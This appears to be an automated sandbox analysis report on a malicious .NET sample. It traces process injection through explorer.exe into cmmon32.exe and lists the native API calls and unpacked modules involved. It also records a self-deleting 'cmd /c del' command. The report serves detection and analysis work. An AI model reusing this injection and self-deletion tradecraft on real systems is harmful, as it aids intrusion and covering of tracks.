          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043C8DBF4_2_043C8DBF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043AADE04_2_043AADE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446EE264_2_0446EE26
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B0E594_2_043B0E59
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446EEDB4_2_0446EEDB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043C2E904_2_043C2E90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446CE934_2_0446CE93
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04424F404_2_04424F40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043D0F304_2_043D0F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043F2F284_2_043F2F28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04452F304_2_04452F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043BCFE04_2_043BCFE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0442EFA04_2_0442EFA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043A2FC84_2_043A2FC8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B28404_2_043B2840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043BA8404_2_043BA840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043968B84_2_043968B8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043DE8F04_2_043DE8F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043C69624_2_043C6962
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B29A04_2_043B29A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0447A9A64_2_0447A9A6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043AEA804_2_043AEA80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446AB404_2_0446AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04466BD74_2_04466BD7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043A14604_2_043A1460
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446F43F4_2_0446F43F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044675714_2_04467571
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044795C34_2_044795C3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0444D5B04_2_0444D5B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043F56304_2_043F5630
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044616CC4_2_044616CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446F7B04_2_0446F7B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0445F0CC4_2_0445F0CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446F0E04_2_0446F0E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044670E94_2_044670E9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B70C04_2_043B70C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0447B16B4_2_0447B16B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0439F1724_2_0439F172
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E516C4_2_043E516C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043BB1B04_2_043BB1B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B52A04_2_043B52A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044512ED4_2_044512ED
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043CB2C04_2_043CB2C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446132D4_2_0446132D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0439D34C4_2_0439D34C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043F739A4_2_043F739A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04429C324_2_04429C32
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446FCF24_2_0446FCF2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04461D5A4_2_04461D5A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04467D734_2_04467D73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B3D404_2_043B3D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043CFDC04_2_043CFDC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B9EB04_2_043B9EB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446FF094_2_0446FF09
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B1F924_2_043B1F92
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04373FD54_2_04373FD5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04373FD24_2_04373FD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446FFB14_2_0446FFB1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0441D8004_2_0441D800
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B38E04_2_043B38E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044459104_2_04445910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B99504_2_043B9950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043CB9504_2_043CB950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04467A464_2_04467A46
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446FA494_2_0446FA49
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04423A6C4_2_04423A6C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0445DAC64_2_0445DAC6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043F5AA04_2_043F5AA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04451AA34_2_04451AA3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0444DAAC4_2_0444DAAC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446FB764_2_0446FB76
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04425BF04_2_04425BF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043CFB804_2_043CFB80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043EDBF94_2_043EDBF9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041E10A4_2_0041E10A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041E4D94_2_0041E4D9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041E81A4_2_0041E81A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00402D884_2_00402D88
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00409E604_2_00409E60
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: String function: 016DB970 appears 280 times
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: String function: 01737E54 appears 102 times
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: String function: 0176F290 appears 105 times
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: String function: 01725130 appears 58 times
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: String function: 0175EA12 appears 86 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0441EA12 appears 86 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043E5130 appears 58 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0442F290 appears 105 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043F7E54 appears 111 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0439B970 appears 280 times
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A40A NtReadFile,2_2_0041A40A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A48A NtClose,2_2_0041A48A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,2_2_0041A53A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722B60 NtClose,LdrInitializeThunk,2_2_01722B60
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01722BF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722AD0 NtReadFile,LdrInitializeThunk,2_2_01722AD0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01722D30
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01722D10
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01722DF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722DD0 NtDelayExecution,LdrInitializeThunk,2_2_01722DD0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01722C70
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01722CA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722F30 NtCreateSection,LdrInitializeThunk,2_2_01722F30
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722FE0 NtCreateFile,LdrInitializeThunk,2_2_01722FE0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722FB0 NtResumeThread,LdrInitializeThunk,2_2_01722FB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01722F90
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01722EA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01722E80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01724340 NtSetContextThread,2_2_01724340
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01724650 NtSuspendThread,2_2_01724650
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722BE0 NtQueryValueKey,2_2_01722BE0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722BA0 NtEnumerateValueKey,2_2_01722BA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722B80 NtQueryInformationFile,2_2_01722B80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722AF0 NtWriteFile,2_2_01722AF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722AB0 NtWaitForSingleObject,2_2_01722AB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722D00 NtSetInformationFile,2_2_01722D00
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722DB0 NtEnumerateKey,2_2_01722DB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722C60 NtCreateKey,2_2_01722C60
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722C00 NtQueryInformationProcess,2_2_01722C00
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722CF0 NtOpenProcess,2_2_01722CF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722CC0 NtQueryVirtualMemory,2_2_01722CC0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722F60 NtCreateProcessEx,2_2_01722F60
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722FA0 NtQuerySection,2_2_01722FA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722E30 NtWriteVirtualMemory,2_2_01722E30
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722EE0 NtQueueApcThread,2_2_01722EE0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01723010 NtOpenDirectoryObject,2_2_01723010
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01723090 NtSetValueKey,2_2_01723090
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017235C0 NtCreateMutant,2_2_017235C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017239B0 NtGetContextThread,2_2_017239B0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01723D70 NtOpenThread,2_2_01723D70
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01723D10 NtOpenProcessToken,2_2_01723D10
          Source: C:\Windows\explorer.exeCode function: 3_2_10E29232 NtCreateFile,3_2_10E29232
          Source: C:\Windows\explorer.exeCode function: 3_2_10E2AE12 NtProtectVirtualMemory,3_2_10E2AE12
          Source: C:\Windows\explorer.exeCode function: 3_2_10E2AE0A NtProtectVirtualMemory,3_2_10E2AE0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_043E2C70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2C60 NtCreateKey,LdrInitializeThunk,4_2_043E2C60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_043E2CA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_043E2D10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_043E2DF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2DD0 NtDelayExecution,LdrInitializeThunk,4_2_043E2DD0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_043E2EA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2F30 NtCreateSection,LdrInitializeThunk,4_2_043E2F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2FE0 NtCreateFile,LdrInitializeThunk,4_2_043E2FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2AD0 NtReadFile,LdrInitializeThunk,4_2_043E2AD0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2B60 NtClose,LdrInitializeThunk,4_2_043E2B60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_043E2BF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_043E2BE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E35C0 NtCreateMutant,LdrInitializeThunk,4_2_043E35C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E4650 NtSuspendThread,4_2_043E4650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E4340 NtSetContextThread,4_2_043E4340
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2C00 NtQueryInformationProcess,4_2_043E2C00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2CF0 NtOpenProcess,4_2_043E2CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2CC0 NtQueryVirtualMemory,4_2_043E2CC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2D30 NtUnmapViewOfSection,4_2_043E2D30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2D00 NtSetInformationFile,4_2_043E2D00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2DB0 NtEnumerateKey,4_2_043E2DB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2E30 NtWriteVirtualMemory,4_2_043E2E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2E80 NtReadVirtualMemory,4_2_043E2E80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2EE0 NtQueueApcThread,4_2_043E2EE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2F60 NtCreateProcessEx,4_2_043E2F60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2FB0 NtResumeThread,4_2_043E2FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2FA0 NtQuerySection,4_2_043E2FA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2F90 NtProtectVirtualMemory,4_2_043E2F90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2AB0 NtWaitForSingleObject,4_2_043E2AB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2AF0 NtWriteFile,4_2_043E2AF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2BA0 NtEnumerateValueKey,4_2_043E2BA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E2B80 NtQueryInformationFile,4_2_043E2B80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E3010 NtOpenDirectoryObject,4_2_043E3010
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E3090 NtSetValueKey,4_2_043E3090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E3D10 NtOpenProcessToken,4_2_043E3D10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E3D70 NtOpenThread,4_2_043E3D70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043E39B0 NtGetContextThread,4_2_043E39B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A360 NtCreateFile,4_2_0041A360
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A410 NtReadFile,4_2_0041A410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A490 NtClose,4_2_0041A490
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A540 NtAllocateVirtualMemory,4_2_0041A540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A40A NtReadFile,4_2_0041A40A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A48A NtClose,4_2_0041A48A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A53A NtAllocateVirtualMemory,4_2_0041A53A
          Source: GCeHcfCef8.exe, 00000000.00000002.1341566186.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exe, 00000000.00000000.1309987461.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEWuh.exe< vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exe, 00000000.00000002.1345322177.0000000004D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exe, 00000000.00000002.1348929969.000000000C450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000017DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001639000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exeBinary or memory string: OriginalFilenameEWuh.exe< vs GCeHcfCef8.exe
          Source: GCeHcfCef8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: GCeHcfCef8.exeReversingLabs: Detection: 45%
          Source: GCeHcfCef8.exeVirustotal: Detection: 55%
          Source: GCeHcfCef8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exe
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GCeHcfCef8.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GCeHcfCef8.exe"Jump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GCeHcfCef8.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@10/8
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, g7LrKAAAjpDeQiBfvZ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, g7LrKAAAjpDeQiBfvZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, g7LrKAAAjpDeQiBfvZ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, g7LrKAAAjpDeQiBfvZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.csSecurity API names: _0020.AddAccessRule
          Source: GCeHcfCef8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeMutant created: \Sessions\1\BaseNamedObjects\gOIlmKB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1104:120:WilError_03
          Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: GCeHcfCef8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GCeHcfCef8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: GCeHcfCef8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: EWuh.pdb source: GCeHcfCef8.exe
          Source: Binary string: EWuh.pdbSHA256. source: GCeHcfCef8.exe
          Source: Binary string: cmmon32.pdb source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
